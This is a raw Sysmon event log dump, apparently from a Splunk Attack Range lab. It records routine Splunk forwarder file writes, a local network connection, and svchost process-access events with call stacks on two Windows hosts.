Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46DB55866711BD30CF2C992EB4372F0B,SHA256=10882E158BF2A95EE11127043CA1A66BB3B840B4B5CADCF0912084E4313B83BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808052Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:08.038{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36E0DDFF6AEE21B4235C85035DD36519,SHA256=7759D0F5A9D63BD6306D3A27F88133F30CB76B6C39B63C2151AF0ECC59DB9EE3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049968Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:59.609{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51067-false10.0.1.12-8000- 23542300x8000000000000000808053Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:09.085{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1A9630421DA02CF5873F41CCEE570DC,SHA256=371350EB1898076C0BBD7AA4C5DA4121BE6C9F4AFE27930CD26522CAA190EDE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049970Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:09.469{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13A92069A80167EEF9E36983AB5DA79C,SHA256=A07874189448A8B842D12CDC28C14ECFD834031A874538E81DA03A8A37FE0A83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049971Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:10.487{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=203800C5ACA490A7105661C4021E4397,SHA256=3CCFA997E9B2FD5EE3AD0FF105DFE78724155C6F21F471B9CE93DF6F0ABFAD5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808054Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:10.100{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E33E7D9DC41D6AB9036FE12A32092C48,SHA256=D49458F65C6986FC1A4F05F5091E506D8E27FE91DE88666E0D939EE6C754BFC2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049993Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:11.965{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049992Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:11.936{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049991Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:11.936{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049990Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:11.936{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049989Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:11.936{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049988Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:11.936{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049987Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:11.936{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x80000000000000001049986Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:11.501{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C232C55C0D7FD40E00763090594F40B,SHA256=43BD8036FF027793D8E5AD8AA8E831BF7F9AFF1F038C03988710DAD247356254,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808055Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:11.132{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17C3AA92D2BD4E74C9DCC8B3CDC29797,SHA256=CDD32F6D44EBD634192612E391716DFA06B787E61ED2BCDCC0F97FF1C86403AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049985Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:11.389{466BC892-32D3-60E8-700B-00000000CF01}16645372C:\Windows\System32\sihost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049984Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:11.389{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001049983Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:11.374{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049982Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:11.374{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049981Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:11.374{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049980Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:11.374{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049979Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:11.374{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049978Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:11.374{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049977Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:11.374{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\
RPCRT4.dll+1ae1c 10341000x80000000000000001049976Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:11.374{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049975Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:11.374{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049974Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
